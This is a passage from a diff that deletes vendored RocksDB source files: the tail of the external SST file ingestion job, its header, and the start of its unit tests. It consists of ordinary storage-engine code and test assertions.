-      InternalStats::INGESTED_LEVEL0_NUM_FILES_TOTAL, total_l0_files);
-}
-
-void ExternalSstFileIngestionJob::Cleanup(const Status& status) {
-  if (!status.ok()) {
-    // We failed to add the files to the database
-    // remove all the files we copied
-    for (IngestedFileInfo& f : files_to_ingest_) {
-      Status s = env_->DeleteFile(f.internal_file_path);
-      if (!s.ok()) {
-        ROCKS_LOG_WARN(db_options_.info_log,
-                       "AddFile() clean up for file %s failed : %s",
-                       f.internal_file_path.c_str(), s.ToString().c_str());
-      }
-    }
-  } else if (status.ok() && ingestion_options_.move_files) {
-    // The files were moved and added successfully, remove original file links
-    for (IngestedFileInfo& f : files_to_ingest_) {
-      Status s = env_->DeleteFile(f.external_file_path);
-      if (!s.ok()) {
-        ROCKS_LOG_WARN(
-            db_options_.info_log,
-            "%s was added to DB successfully but failed to remove original "
-            "file link : %s",
-            f.external_file_path.c_str(), s.ToString().c_str());
-      }
-    }
-  }
-}
-
-Status ExternalSstFileIngestionJob::GetIngestedFileInfo(
-    const std::string& external_file, IngestedFileInfo* file_to_ingest) {
-  file_to_ingest->external_file_path = external_file;
-
-  // Get external file size
-  Status status = env_->GetFileSize(external_file, &file_to_ingest->file_size);
-  if (!status.ok()) {
-    return status;
-  }
-
-  // Create TableReader for external file
-  std::unique_ptr<TableReader> table_reader;
-  std::unique_ptr<RandomAccessFile> sst_file;
-  std::unique_ptr<RandomAccessFileReader> sst_file_reader;
-
-  status = env_->NewRandomAccessFile(external_file, &sst_file, env_options_);
-  if (!status.ok()) {
-    return status;
-  }
-  sst_file_reader.reset(new RandomAccessFileReader(std::move(sst_file),
-                                                   external_file));
-
-  status = cfd_->ioptions()->table_factory->NewTableReader(
-      TableReaderOptions(*cfd_->ioptions(), env_options_,
-                         cfd_->internal_comparator()),
-      std::move(sst_file_reader), file_to_ingest->file_size, &table_reader);
-  if (!status.ok()) {
-    return status;
-  }
-
-  // Get the external file properties
-  auto props = table_reader->GetTableProperties();
-  const auto& uprops = props->user_collected_properties;
-
-  // Get table version
-  auto version_iter = uprops.find(ExternalSstFilePropertyNames::kVersion);
-  if (version_iter == uprops.end()) {
-    return Status::Corruption("External file version not found");
-  }
-  file_to_ingest->version = DecodeFixed32(version_iter->second.c_str());
-
-  auto seqno_iter = uprops.find(ExternalSstFilePropertyNames::kGlobalSeqno);
-  if (file_to_ingest->version == 2) {
-    // version 2 imply that we have global sequence number
-    if (seqno_iter == uprops.end()) {
-      return Status::Corruption(
-          "External file global sequence number not found");
-    }
-
-    // Set the global sequence number
-    file_to_ingest->original_seqno = DecodeFixed64(seqno_iter->second.c_str());
-    file_to_ingest->global_seqno_offset = props->properties_offsets.at(
-        ExternalSstFilePropertyNames::kGlobalSeqno);
-
-    if (file_to_ingest->global_seqno_offset == 0) {
-      return Status::Corruption("Was not able to find file global seqno field");
-    }
-  } else if (file_to_ingest->version == 1) {
-    // SST file V1 should not have global seqno field
-    assert(seqno_iter == uprops.end());
-    file_to_ingest->original_seqno = 0;
-    if (ingestion_options_.allow_blocking_flush ||
-            ingestion_options_.allow_global_seqno) {
-      return Status::InvalidArgument(
-            "External SST file V1 does not support global seqno");
-    }
-  } else {
-    return Status::InvalidArgument("External file version is not supported");
-  }
-  // Get number of entries in table
-  file_to_ingest->num_entries = props->num_entries;
-
-  ParsedInternalKey key;
-  ReadOptions ro;
-  // During reading the external file we can cache blocks that we read into
-  // the block cache, if we later change the global seqno of this file, we will
-  // have block in cache that will include keys with wrong seqno.
-  // We need to disable fill_cache so that we read from the file without
-  // updating the block cache.
-  ro.fill_cache = false;
-  std::unique_ptr<InternalIterator> iter(table_reader->NewIterator(ro));
-
-  // Get first (smallest) key from file
-  iter->SeekToFirst();
-  if (!ParseInternalKey(iter->key(), &key)) {
-    return Status::Corruption("external file have corrupted keys");
-  }
-  if (key.sequence != 0) {
-    return Status::Corruption("external file have non zero sequence number");
-  }
-  file_to_ingest->smallest_user_key = key.user_key.ToString();
-
-  // Get last (largest) key from file
-  iter->SeekToLast();
-  if (!ParseInternalKey(iter->key(), &key)) {
-    return Status::Corruption("external file have corrupted keys");
-  }
-  if (key.sequence != 0) {
-    return Status::Corruption("external file have non zero sequence number");
-  }
-  file_to_ingest->largest_user_key = key.user_key.ToString();
-
-  file_to_ingest->cf_id = static_cast<uint32_t>(props->column_family_id);
-
-  file_to_ingest->table_properties = *props;
-
-  return status;
-}
-
-Status ExternalSstFileIngestionJob::IngestedFilesOverlapWithMemtables(
-    SuperVersion* sv, bool* overlap) {
-  // Create an InternalIterator over all memtables
-  Arena arena;
-  ReadOptions ro;
-  ro.total_order_seek = true;
-  MergeIteratorBuilder merge_iter_builder(&cfd_->internal_comparator(), &arena);
-  merge_iter_builder.AddIterator(sv->mem->NewIterator(ro, &arena));
-  sv->imm->AddIterators(ro, &merge_iter_builder);
-  ScopedArenaIterator memtable_iter(merge_iter_builder.Finish());
-
-  std::vector<InternalIterator*> memtable_range_del_iters;
-  auto* active_range_del_iter = sv->mem->NewRangeTombstoneIterator(ro);
-  if (active_range_del_iter != nullptr) {
-    memtable_range_del_iters.push_back(active_range_del_iter);
-  }
-  sv->imm->AddRangeTombstoneIterators(ro, &memtable_range_del_iters);
-  std::unique_ptr<InternalIterator> memtable_range_del_iter(NewMergingIterator(
-      &cfd_->internal_comparator(),
-      memtable_range_del_iters.empty() ? nullptr : &memtable_range_del_iters[0],
-      static_cast<int>(memtable_range_del_iters.size())));
-
-  Status status;
-  *overlap = false;
-  for (IngestedFileInfo& f : files_to_ingest_) {
-    status =
-        IngestedFileOverlapWithIteratorRange(&f, memtable_iter.get(), overlap);
-    if (!status.ok() || *overlap == true) {
-      break;
-    }
-    status = IngestedFileOverlapWithRangeDeletions(
-        &f, memtable_range_del_iter.get(), overlap);
-    if (!status.ok() || *overlap == true) {
-      break;
-    }
-  }
-
-  return status;
-}
-
-Status ExternalSstFileIngestionJob::AssignLevelAndSeqnoForIngestedFile(
-    SuperVersion* sv, bool force_global_seqno, CompactionStyle compaction_style,
-    IngestedFileInfo* file_to_ingest, SequenceNumber* assigned_seqno) {
-  Status status;
-  *assigned_seqno = 0;
-  const SequenceNumber last_seqno = versions_->LastSequence();
-  if (force_global_seqno) {
-    *assigned_seqno = last_seqno + 1;
-    if (compaction_style == kCompactionStyleUniversal) {
-      file_to_ingest->picked_level = 0;
-      return status;
-    }
-  }
-
-  bool overlap_with_db = false;
-  Arena arena;
-  ReadOptions ro;
-  ro.total_order_seek = true;
-  int target_level = 0;
-  auto* vstorage = cfd_->current()->storage_info();
-
-  for (int lvl = 0; lvl < cfd_->NumberLevels(); lvl++) {
-    if (lvl > 0 && lvl < vstorage->base_level()) {
-      continue;
-    }
-
-    if (vstorage->NumLevelFiles(lvl) > 0) {
-      bool overlap_with_level = false;
-      status = IngestedFileOverlapWithLevel(sv, file_to_ingest, lvl,
-        &overlap_with_level);
-      if (!status.ok()) {
-        return status;
-      }
-      if (overlap_with_level) {
-        // We must use L0 or any level higher than `lvl` to be able to overwrite
-        // the keys that we overlap with in this level, We also need to assign
-        // this file a seqno to overwrite the existing keys in level `lvl`
-        overlap_with_db = true;
-        break;
-      }
-
-      if (compaction_style == kCompactionStyleUniversal && lvl != 0) {
-        const std::vector<FileMetaData*>& level_files =
-            vstorage->LevelFiles(lvl);
-        const SequenceNumber level_largest_seqno =
-            (*max_element(level_files.begin(), level_files.end(),
-                          [](FileMetaData* f1, FileMetaData* f2) {
-                            return f1->largest_seqno < f2->largest_seqno;
-                          }))
-                ->largest_seqno;
-        if (level_largest_seqno != 0) {
-          *assigned_seqno = level_largest_seqno;
-        } else {
-          continue;
-        }
-      }
-    } else if (compaction_style == kCompactionStyleUniversal) {
-      continue;
-    }
-
-    // We dont overlap with any keys in this level, but we still need to check
-    // if our file can fit in it
-    if (IngestedFileFitInLevel(file_to_ingest, lvl)) {
-      target_level = lvl;
-    }
-  }
- TEST_SYNC_POINT_CALLBACK(
-      "ExternalSstFileIngestionJob::AssignLevelAndSeqnoForIngestedFile",
-      &overlap_with_db);
-  file_to_ingest->picked_level = target_level;
-  if (overlap_with_db && *assigned_seqno == 0) {
-    *assigned_seqno = last_seqno + 1;
-  }
-  return status;
-}
-
-Status ExternalSstFileIngestionJob::CheckLevelForIngestedBehindFile(
-    IngestedFileInfo* file_to_ingest) {
-  auto* vstorage = cfd_->current()->storage_info();
-  // first check if new files fit in the bottommost level
-  int bottom_lvl = cfd_->NumberLevels() - 1;
-  if(!IngestedFileFitInLevel(file_to_ingest, bottom_lvl)) {
-    return Status::InvalidArgument(
-      "Can't ingest_behind file as it doesn't fit "
-      "at the bottommost level!");
-  }
-
-  // second check if despite allow_ingest_behind=true we still have 0 seqnums
-  // at some upper level
-  for (int lvl = 0; lvl < cfd_->NumberLevels() - 1; lvl++) {
-    for (auto file : vstorage->LevelFiles(lvl)) {
-      if (file->smallest_seqno == 0) {
-        return Status::InvalidArgument(
-          "Can't ingest_behind file as despite allow_ingest_behind=true "
-          "there are files with 0 seqno in database at upper levels!");
-      }
-    }
-  }
-
-  file_to_ingest->picked_level = bottom_lvl;
-  return Status::OK();
-}
-
-Status ExternalSstFileIngestionJob::AssignGlobalSeqnoForIngestedFile(
-    IngestedFileInfo* file_to_ingest, SequenceNumber seqno) {
-  if (file_to_ingest->original_seqno == seqno) {
-    // This file already have the correct global seqno
-    return Status::OK();
-  } else if (!ingestion_options_.allow_global_seqno) {
-    return Status::InvalidArgument("Global seqno is required, but disabled");
-  } else if (file_to_ingest->global_seqno_offset == 0) {
-    return Status::InvalidArgument(
-        "Trying to set global seqno for a file that dont have a global seqno "
-        "field");
-  }
-
-  std::unique_ptr<RandomRWFile> rwfile;
-  Status status = env_->NewRandomRWFile(file_to_ingest->internal_file_path,
-                                        &rwfile, env_options_);
-  if (!status.ok()) {
-    return status;
-  }
-
-  // Write the new seqno in the global sequence number field in the file
-  std::string seqno_val;
-  PutFixed64(&seqno_val, seqno);
-  status = rwfile->Write(file_to_ingest->global_seqno_offset, seqno_val);
-  if (status.ok()) {
-    file_to_ingest->assigned_seqno = seqno;
-  }
-  return status;
-}
-
-Status ExternalSstFileIngestionJob::IngestedFileOverlapWithIteratorRange(
-    const IngestedFileInfo* file_to_ingest, InternalIterator* iter,
-    bool* overlap) {
-  auto* vstorage = cfd_->current()->storage_info();
-  auto* ucmp = vstorage->InternalComparator()->user_comparator();
-  InternalKey range_start(file_to_ingest->smallest_user_key, kMaxSequenceNumber,
-                          kValueTypeForSeek);
-  iter->Seek(range_start.Encode());
-  if (!iter->status().ok()) {
-    return iter->status();
-  }
-
-  *overlap = false;
-  if (iter->Valid()) {
-    ParsedInternalKey seek_result;
-    if (!ParseInternalKey(iter->key(), &seek_result)) {
-      return Status::Corruption("DB have corrupted keys");
-    }
-
-    if (ucmp->Compare(seek_result.user_key, file_to_ingest->largest_user_key) <=
-        0) {
-      *overlap = true;
-    }
-  }
-
-  return iter->status();
-}
-
-Status ExternalSstFileIngestionJob::IngestedFileOverlapWithRangeDeletions(
-    const IngestedFileInfo* file_to_ingest, InternalIterator* range_del_iter,
-    bool* overlap) {
-  auto* vstorage = cfd_->current()->storage_info();
-  auto* ucmp = vstorage->InternalComparator()->user_comparator();
-
-  *overlap = false;
-  if (range_del_iter != nullptr) {
-    for (range_del_iter->SeekToFirst(); range_del_iter->Valid();
-         range_del_iter->Next()) {
-      ParsedInternalKey parsed_key;
-      if (!ParseInternalKey(range_del_iter->key(), &parsed_key)) {
-        return Status::Corruption("corrupted range deletion key: " +
-                                  range_del_iter->key().ToString());
-      }
-      RangeTombstone range_del(parsed_key, range_del_iter->value());
-      if (ucmp->Compare(range_del.start_key_,
-                        file_to_ingest->largest_user_key) <= 0 &&
-          ucmp->Compare(file_to_ingest->smallest_user_key,
-                        range_del.end_key_) <= 0) {
-        *overlap = true;
-        break;
-      }
-    }
-  }
-  return Status::OK();
-}
-
-bool ExternalSstFileIngestionJob::IngestedFileFitInLevel(
-    const IngestedFileInfo* file_to_ingest, int level) {
-  if (level == 0) {
-    // Files can always fit in L0
-    return true;
-  }
-
-  auto* vstorage = cfd_->current()->storage_info();
-  Slice file_smallest_user_key(file_to_ingest->smallest_user_key);
-  Slice file_largest_user_key(file_to_ingest->largest_user_key);
-
-  if (vstorage->OverlapInLevel(level, &file_smallest_user_key,
-                               &file_largest_user_key)) {
-    // File overlap with another files in this level, we cannot
-    // add it to this level
-    return false;
-  }
-  if (cfd_->RangeOverlapWithCompaction(file_smallest_user_key,
-                                       file_largest_user_key, level)) {
-    // File overlap with a running compaction output that will be stored
-    // in this level, we cannot add this file to this level
-    return false;
-  }
-
-  // File did not overlap with level files, our compaction output
-  return true;
-}
-
-Status ExternalSstFileIngestionJob::IngestedFileOverlapWithLevel(
-    SuperVersion* sv, IngestedFileInfo* file_to_ingest, int lvl,
-    bool* overlap_with_level) {
-  Arena arena;
-  ReadOptions ro;
-  ro.total_order_seek = true;
-  MergeIteratorBuilder merge_iter_builder(&cfd_->internal_comparator(),
-                                          &arena);
-  sv->current->AddIteratorsForLevel(ro, env_options_, &merge_iter_builder, lvl,
-                                    nullptr /* range_del_agg */);
-  ScopedArenaIterator level_iter(merge_iter_builder.Finish());
-
-  std::vector<InternalIterator*> level_range_del_iters;
-  sv->current->AddRangeDelIteratorsForLevel(ro, env_options_, lvl,
-                                            &level_range_del_iters);
-  std::unique_ptr<InternalIterator> level_range_del_iter(NewMergingIterator(
-      &cfd_->internal_comparator(),
-      level_range_del_iters.empty() ? nullptr : &level_range_del_iters[0],
-      static_cast<int>(level_range_del_iters.size())));
-
-  Status status = IngestedFileOverlapWithIteratorRange(
-      file_to_ingest, level_iter.get(), overlap_with_level);
-  if (status.ok() && *overlap_with_level == false) {
-    status = IngestedFileOverlapWithRangeDeletions(
-        file_to_ingest, level_range_del_iter.get(), overlap_with_level);
-  }
-  return status;
-}
-
-}  // namespace rocksdb
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/external_sst_file_ingestion_job.h b/thirdparty/rocksdb/db/external_sst_file_ingestion_job.h
deleted file mode 100644
index 2d0fade..0000000
--- a/thirdparty/rocksdb/db/external_sst_file_ingestion_job.h
+++ /dev/null
@@ -1,171 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#include <string>
-#include <unordered_set>
-#include <vector>
-
-#include "db/column_family.h"
-#include "db/dbformat.h"
-#include "db/internal_stats.h"
-#include "db/snapshot_impl.h"
-#include "options/db_options.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/sst_file_writer.h"
-#include "util/autovector.h"
-
-namespace rocksdb {
-
-struct IngestedFileInfo {
-  // External file path
-  std::string external_file_path;
-  // Smallest user key in external file
-  std::string smallest_user_key;
-  // Largest user key in external file
-  std::string largest_user_key;
-  // Sequence number for keys in external file
-  SequenceNumber original_seqno;
-  // Offset of the global sequence number field in the file, will
-  // be zero if version is 1 (global seqno is not supported)
-  size_t global_seqno_offset;
-  // External file size
-  uint64_t file_size;
-  // total number of keys in external file
-  uint64_t num_entries;
-  // Id of column family this file shoule be ingested into
-  uint32_t cf_id;
-  // TableProperties read from external file
-  TableProperties table_properties;
-  // Version of external file
-  int version;
-
-  // FileDescriptor for the file inside the DB
-  FileDescriptor fd;
-  // file path that we picked for file inside the DB
-  std::string internal_file_path = "";
-  // Global sequence number that we picked for the file inside the DB
-  SequenceNumber assigned_seqno = 0;
-  // Level inside the DB we picked for the external file.
-  int picked_level = 0;
-
-  InternalKey smallest_internal_key() const {
-    return InternalKey(smallest_user_key, assigned_seqno,
-                       ValueType::kTypeValue);
-  }
-
-  InternalKey largest_internal_key() const {
-    return InternalKey(largest_user_key, assigned_seqno, ValueType::kTypeValue);
-  }
-};
-
-class ExternalSstFileIngestionJob {
- public:
-  ExternalSstFileIngestionJob(
-      Env* env, VersionSet* versions, ColumnFamilyData* cfd,
-      const ImmutableDBOptions& db_options, const EnvOptions& env_options,
-      SnapshotList* db_snapshots,
-      const IngestExternalFileOptions& ingestion_options)
-      : env_(env),
-        versions_(versions),
-        cfd_(cfd),
-        db_options_(db_options),
-        env_options_(env_options),
-        db_snapshots_(db_snapshots),
-        ingestion_options_(ingestion_options),
-        job_start_time_(env_->NowMicros()) {}
-
-  // Prepare the job by copying external files into the DB.
-  Status Prepare(const std::vector<std::string>& external_files_paths);
-
-  // Check if we need to flush the memtable before running the ingestion job
-  // This will be true if the files we are ingesting are overlapping with any
-  // key range in the memtable.
-  // REQUIRES: Mutex held
-  Status NeedsFlush(bool* flush_needed);
-
-  // Will execute the ingestion job and prepare edit() to be applied.
-  // REQUIRES: Mutex held
-  Status Run();
-
-  // Update column family stats.
-  // REQUIRES: Mutex held
-  void UpdateStats();
-
-  // Cleanup after successful/failed job
-  void Cleanup(const Status& status);
-
-  VersionEdit* edit() { return &edit_; }
-
-  const autovector<IngestedFileInfo>& files_to_ingest() const {
-    return files_to_ingest_;
-  }
-
- private:
-  // Open the external file and populate `file_to_ingest` with all the
-  // external information we need to ingest this file.
-  Status GetIngestedFileInfo(const std::string& external_file,
-                             IngestedFileInfo* file_to_ingest);
-
-  // Check if the files we are ingesting overlap with any memtable.
-  // REQUIRES: Mutex held
-  Status IngestedFilesOverlapWithMemtables(SuperVersion* sv, bool* overlap);
-
-  // Assign `file_to_ingest` the appropriate sequence number and  the lowest
-  // possible level that it can be ingested to according to compaction_style.
-  // REQUIRES: Mutex held
-  Status AssignLevelAndSeqnoForIngestedFile(SuperVersion* sv,
-                                            bool force_global_seqno,
-                                            CompactionStyle compaction_style,
-                                            IngestedFileInfo* file_to_ingest,
-                                            SequenceNumber* assigned_seqno);
-
-  // File that we want to ingest behind always goes to the lowest level;
-  // we just check that it fits in the level, that DB allows ingest_behind,
-  // and that we don't have 0 seqnums at the upper levels.
-  // REQUIRES: Mutex held
-  Status CheckLevelForIngestedBehindFile(IngestedFileInfo* file_to_ingest);
-
-  // Set the file global sequence number to `seqno`
-  Status AssignGlobalSeqnoForIngestedFile(IngestedFileInfo* file_to_ingest,
-                                          SequenceNumber seqno);
-
-  // Check if `file_to_ingest` key range overlap with the range `iter` represent
-  // REQUIRES: Mutex held
-  Status IngestedFileOverlapWithIteratorRange(
-      const IngestedFileInfo* file_to_ingest, InternalIterator* iter,
-      bool* overlap);
-
-  // Check if `file_to_ingest` key range overlaps with any range deletions
-  // specified by `iter`.
-  // REQUIRES: Mutex held
-  Status IngestedFileOverlapWithRangeDeletions(
-      const IngestedFileInfo* file_to_ingest, InternalIterator* range_del_iter,
-      bool* overlap);
-
-  // Check if `file_to_ingest` key range overlap with level
-  // REQUIRES: Mutex held
-  Status IngestedFileOverlapWithLevel(SuperVersion* sv,
-    IngestedFileInfo* file_to_ingest, int lvl, bool* overlap_with_level);
-
-  // Check if `file_to_ingest` can fit in level `level`
-  // REQUIRES: Mutex held
-  bool IngestedFileFitInLevel(const IngestedFileInfo* file_to_ingest,
-                              int level);
-
-  Env* env_;
-  VersionSet* versions_;
-  ColumnFamilyData* cfd_;
-  const ImmutableDBOptions& db_options_;
-  const EnvOptions& env_options_;
-  SnapshotList* db_snapshots_;
-  autovector<IngestedFileInfo> files_to_ingest_;
-  const IngestExternalFileOptions& ingestion_options_;
-  VersionEdit edit_;
-  uint64_t job_start_time_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/external_sst_file_test.cc b/thirdparty/rocksdb/db/external_sst_file_test.cc
deleted file mode 100644
index 4a4e82e..0000000
--- a/thirdparty/rocksdb/db/external_sst_file_test.cc
+++ /dev/null
@@ -1,1961 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include <functional>
-#include "db/db_test_util.h"
-#include "port/port.h"
-#include "port/stack_trace.h"
-#include "rocksdb/sst_file_writer.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-class ExternalSSTFileTest : public DBTestBase {
- public:
-  ExternalSSTFileTest() : DBTestBase("/external_sst_file_test") {
-    sst_files_dir_ = dbname_ + "/sst_files/";
-    DestroyAndRecreateExternalSSTFilesDir();
-  }
-
-  void DestroyAndRecreateExternalSSTFilesDir() {
-    test::DestroyDir(env_, sst_files_dir_);
-    env_->CreateDir(sst_files_dir_);
-  }
-
-  Status GenerateAndAddExternalFile(
-      const Options options,
-      std::vector<std::pair<std::string, std::string>> data, int file_id = -1,
-      bool allow_global_seqno = false, bool sort_data = false,
-      std::map<std::string, std::string>* true_data = nullptr,
-      ColumnFamilyHandle* cfh = nullptr) {
-    // Generate a file id if not provided
-    if (file_id == -1) {
-      file_id = last_file_id_ + 1;
-      last_file_id_++;
-    }
-
-    // Sort data if asked to do so
-    if (sort_data) {
-      std::sort(data.begin(), data.end(),
-                [&](const std::pair<std::string, std::string>& e1,
-                    const std::pair<std::string, std::string>& e2) {
-                  return options.comparator->Compare(e1.first, e2.first) < 0;
-                });
-      auto uniq_iter = std::unique(
-          data.begin(), data.end(),
-          [&](const std::pair<std::string, std::string>& e1,
-              const std::pair<std::string, std::string>& e2) {
-            return options.comparator->Compare(e1.first, e2.first) == 0;
-          });
-      data.resize(uniq_iter - data.begin());
-    }
-    std::string file_path = sst_files_dir_ + ToString(file_id);
-    SstFileWriter sst_file_writer(EnvOptions(), options, cfh);
-
-    Status s = sst_file_writer.Open(file_path);
-    if (!s.ok()) {
-      return s;
-    }
-    for (auto& entry : data) {
-      s = sst_file_writer.Put(entry.first, entry.second);
-      if (!s.ok()) {
-        sst_file_writer.Finish();
-        return s;
-      }
-    }
-    s = sst_file_writer.Finish();
-
-    if (s.ok()) {
-      IngestExternalFileOptions ifo;
-      ifo.allow_global_seqno = allow_global_seqno;
-      if (cfh) {
-        s = db_->IngestExternalFile(cfh, {file_path}, ifo);
-      } else {
-        s = db_->IngestExternalFile({file_path}, ifo);
-      }
-    }
-
-    if (s.ok() && true_data) {
-      for (auto& entry : data) {
-        (*true_data)[entry.first] = entry.second;
-      }
-    }
-
-    return s;
-  }
-
-  Status GenerateAndAddExternalFileIngestBehind(
-      const Options options, const IngestExternalFileOptions ifo,
-      std::vector<std::pair<std::string, std::string>> data, int file_id = -1,
-      bool sort_data = false,
-      std::map<std::string, std::string>* true_data = nullptr,
-      ColumnFamilyHandle* cfh = nullptr) {
-    // Generate a file id if not provided
-    if (file_id == -1) {
-      file_id = last_file_id_ + 1;
-      last_file_id_++;
-    }
-
-    // Sort data if asked to do so
-    if (sort_data) {
-      std::sort(data.begin(), data.end(),
-                [&](const std::pair<std::string, std::string>& e1,
-                    const std::pair<std::string, std::string>& e2) {
-                  return options.comparator->Compare(e1.first, e2.first) < 0;
-                });
-      auto uniq_iter = std::unique(
-          data.begin(), data.end(),
-          [&](const std::pair<std::string, std::string>& e1,
-              const std::pair<std::string, std::string>& e2) {
-            return options.comparator->Compare(e1.first, e2.first) == 0;
-          });
-      data.resize(uniq_iter - data.begin());
-    }
-    std::string file_path = sst_files_dir_ + ToString(file_id);
-    SstFileWriter sst_file_writer(EnvOptions(), options, cfh);
-
-    Status s = sst_file_writer.Open(file_path);
-    if (!s.ok()) {
-      return s;
-    }
-    for (auto& entry : data) {
-      s = sst_file_writer.Put(entry.first, entry.second);
-      if (!s.ok()) {
-        sst_file_writer.Finish();
-        return s;
-      }
-    }
-    s = sst_file_writer.Finish();
-
-    if (s.ok()) {
-      if (cfh) {
-        s = db_->IngestExternalFile(cfh, {file_path}, ifo);
-      } else {
-        s = db_->IngestExternalFile({file_path}, ifo);
-      }
-    }
-
-    if (s.ok() && true_data) {
-      for (auto& entry : data) {
-        (*true_data)[entry.first] = entry.second;
-      }
-    }
-
-    return s;
-  }
-
-
-
-  Status GenerateAndAddExternalFile(
-      const Options options, std::vector<std::pair<int, std::string>> data,
-      int file_id = -1, bool allow_global_seqno = false, bool sort_data = false,
-      std::map<std::string, std::string>* true_data = nullptr,
-      ColumnFamilyHandle* cfh = nullptr) {
-    std::vector<std::pair<std::string, std::string>> file_data;
-    for (auto& entry : data) {
-      file_data.emplace_back(Key(entry.first), entry.second);
-    }
-    return GenerateAndAddExternalFile(options, file_data, file_id,
-                                      allow_global_seqno, sort_data, true_data,
-                                      cfh);
-  }
-
-  Status GenerateAndAddExternalFile(
-      const Options options, std::vector<int> keys, int file_id = -1,
-      bool allow_global_seqno = false, bool sort_data = false,
-      std::map<std::string, std::string>* true_data = nullptr,
-      ColumnFamilyHandle* cfh = nullptr) {
-    std::vector<std::pair<std::string, std::string>> file_data;
-    for (auto& k : keys) {
-      file_data.emplace_back(Key(k), Key(k) + ToString(file_id));
-    }
-    return GenerateAndAddExternalFile(options, file_data, file_id,
-                                      allow_global_seqno, sort_data, true_data,
-                                      cfh);
-  }
-
-  Status DeprecatedAddFile(const std::vector<std::string>& files,
-                           bool move_files = false,
-                           bool skip_snapshot_check = false) {
-    IngestExternalFileOptions opts;
-    opts.move_files = move_files;
-    opts.snapshot_consistency = !skip_snapshot_check;
-    opts.allow_global_seqno = false;
-    opts.allow_blocking_flush = false;
-    return db_->IngestExternalFile(files, opts);
-  }
-
-  ~ExternalSSTFileTest() { test::DestroyDir(env_, sst_files_dir_); }
-
- protected:
-  int last_file_id_ = 0;
-  std::string sst_files_dir_;
-};
-
-TEST_F(ExternalSSTFileTest, Basic) {
-  do {
-    Options options = CurrentOptions();
-
-    SstFileWriter sst_file_writer(EnvOptions(), options);
-
-    // Current file size should be 0 after sst_file_writer init and before open a file.
-    ASSERT_EQ(sst_file_writer.FileSize(), 0);
-
-    // file1.sst (0 => 99)
-    std::string file1 = sst_files_dir_ + "file1.sst";
-    ASSERT_OK(sst_file_writer.Open(file1));
-    for (int k = 0; k < 100; k++) {
-      ASSERT_OK(sst_file_writer.Put(Key(k), Key(k) + "_val"));
-    }
-    ExternalSstFileInfo file1_info;
-    Status s = sst_file_writer.Finish(&file1_info);
-    ASSERT_TRUE(s.ok()) << s.ToString();
-
-    // Current file size should be non-zero after success write.
-    ASSERT_GT(sst_file_writer.FileSize(), 0);
-
-    ASSERT_EQ(file1_info.file_path, file1);
-    ASSERT_EQ(file1_info.num_entries, 100);
-    ASSERT_EQ(file1_info.smallest_key, Key(0));
-    ASSERT_EQ(file1_info.largest_key, Key(99));
-    // sst_file_writer already finished, cannot add this value
-    s = sst_file_writer.Put(Key(100), "bad_val");
-    ASSERT_FALSE(s.ok()) << s.ToString();
-
-    // file2.sst (100 => 199)
-    std::string file2 = sst_files_dir_ + "file2.sst";
-    ASSERT_OK(sst_file_writer.Open(file2));
-    for (int k = 100; k < 200; k++) {
-      ASSERT_OK(sst_file_writer.Put(Key(k), Key(k) + "_val"));
-    }
-    // Cannot add this key because it's not after last added key
-    s = sst_file_writer.Put(Key(99), "bad_val");
-    ASSERT_FALSE(s.ok()) << s.ToString();
-    ExternalSstFileInfo file2_info;
-    s = sst_file_writer.Finish(&file2_info);
-    ASSERT_TRUE(s.ok()) << s.ToString();
-    ASSERT_EQ(file2_info.file_path, file2);
-    ASSERT_EQ(file2_info.num_entries, 100);
-    ASSERT_EQ(file2_info.smallest_key, Key(100));
-    ASSERT_EQ(file2_info.largest_key, Key(199));
-
-    // file3.sst (195 => 299)
-    // This file values overlap with file2 values
-    std::string file3 = sst_files_dir_ + "file3.sst";
-    ASSERT_OK(sst_file_writer.Open(file3));
-    for (int k = 195; k < 300; k++) {
-      ASSERT_OK(sst_file_writer.Put(Key(k), Key(k) + "_val_overlap"));
-    }
-    ExternalSstFileInfo file3_info;
-    s = sst_file_writer.Finish(&file3_info);
-
-    ASSERT_TRUE(s.ok()) << s.ToString();
-    // Current file size should be non-zero after success finish.
-    ASSERT_GT(sst_file_writer.FileSize(), 0);
-    ASSERT_EQ(file3_info.file_path, file3);
-    ASSERT_EQ(file3_info.num_entries, 105);
-    ASSERT_EQ(file3_info.smallest_key, Key(195));
-    ASSERT_EQ(file3_info.largest_key, Key(299));
-
-    // file4.sst (30 => 39)
-    // This file values overlap with file1 values
-    std::string file4 = sst_files_dir_ + "file4.sst";
-    ASSERT_OK(sst_file_writer.Open(file4));
-    for (int k = 30; k < 40; k++) {
-      ASSERT_OK(sst_file_writer.Put(Key(k), Key(k) + "_val_overlap"));
-    }
-    ExternalSstFileInfo file4_info;
-    s = sst_file_writer.Finish(&file4_info);
-    ASSERT_TRUE(s.ok()) << s.ToString();
-    ASSERT_EQ(file4_info.file_path, file4);
-    ASSERT_EQ(file4_info.num_entries, 10);
-    ASSERT_EQ(file4_info.smallest_key, Key(30));
-    ASSERT_EQ(file4_info.largest_key, Key(39));
-
-    // file5.sst (400 => 499)
-    std::string file5 = sst_files_dir_ + "file5.sst";
-    ASSERT_OK(sst_file_writer.Open(file5));
-    for (int k = 400; k < 500; k++) {
-      ASSERT_OK(sst_file_writer.Put(Key(k), Key(k) + "_val"));
-    }
-    ExternalSstFileInfo file5_info;
-    s = sst_file_writer.Finish(&file5_info);
-    ASSERT_TRUE(s.ok()) << s.ToString();
-    ASSERT_EQ(file5_info.file_path, file5);
-    ASSERT_EQ(file5_info.num_entries, 100);
-    ASSERT_EQ(file5_info.smallest_key, Key(400));
-    ASSERT_EQ(file5_info.largest_key, Key(499));
-
-    // Cannot create an empty sst file
-    std::string file_empty = sst_files_dir_ + "file_empty.sst";
-    ExternalSstFileInfo file_empty_info;
-    s = sst_file_writer.Finish(&file_empty_info);
